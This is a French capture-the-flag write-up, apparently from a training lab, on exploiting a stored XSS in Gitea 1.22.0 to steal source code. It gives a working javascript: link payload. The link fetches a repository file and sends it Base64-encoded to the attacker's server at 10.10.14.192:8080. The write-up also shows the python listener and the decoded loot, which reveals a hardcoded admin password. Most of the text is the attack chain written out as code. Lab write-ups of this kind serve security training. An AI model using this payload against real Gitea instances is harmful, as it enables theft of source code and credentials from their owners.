XXS - Source Code Theft

Vulnérabilité XSS sur Gitea (v1.22.0)

Sur http://localhost:3000 ➜ Gitea accessible.

Connexion avec les identifiants d’Axel.

Vulnérabilité XSS connue.

On crée un projet avec une description contenant :

<a href=javascript:alert()>XSS test</a>

Résultat:

Mail intercepté via LinPEAS

Contenu d’un email :

jobert@localhost doit vérifier le dépôt Gitea

On envoie un lien XSS contenant un script d’exfiltration qui lit le contenu de la page index.php du dépôt Gitea, l’encode en Base64, puis l’envoie vers notre serveur web

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.14.192:8080/?d=' + encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));">PWNED</a>

Via notre serveur web

python -m http.server 8080

Contenu exfiltré (base64 décodé) :

echo "PD9waHAKJHZhbGlkX3VzZXJuYW1lID0gJ2FkbWluJzsKJHZhbGlkX3Bhc3N3b3JkID0gJ0lLdzc1ZVIwTVI3Q01JeGhIMCc7CgppZiAoIWlzc2V0KCRfU0VSVkVSWydQSFBfQVVUSF9VU0VSJ10pIHx8ICFpc3NldCgkX1NFUlZFUlsnUEhQX0FVVEhfUFcnXSkgfHwgCiAgICAkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddICE9ICR2YWxpZF91c2VybmFtZSB8fCAkX1NFUlZFUlsnUEhQX0FVVEhfUFcnXSAhPSAkdmFsaWRfcGFzc3dvcmQpIHsKICAgIAogICAgaGVhZGVyKCdXV1ctQXV0aGVudGljYXRlOiBCYXNpYyByZWFsbT0iRW1wbG95ZWUgTWFuYWdlbWVudCInKTsKICAgIGhlYWRlcignSFRUUC8xLjAgNDAxIFVuYXV0aG9yaXplZCcpOwogICAgZXhpdDsKfQoKaGVhZGVyKCdMb2NhdGlvbjogZGFzaGJvYXJkLnBocCcpOwpleGl0Owo%2FPgoK" | base64 -d

$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

Mis à jour il y a 10 mois

hashtagVulnérabilité XSS sur Gitea (v1.22.0)

hashtagMail intercepté via LinPEAS

hashtagVia notre serveur web

hashtagContenu exfiltré (base64 décodé) :

Vulnérabilité XSS sur Gitea (v1.22.0)

Mail intercepté via LinPEAS

Via notre serveur web

Contenu exfiltré (base64 décodé) :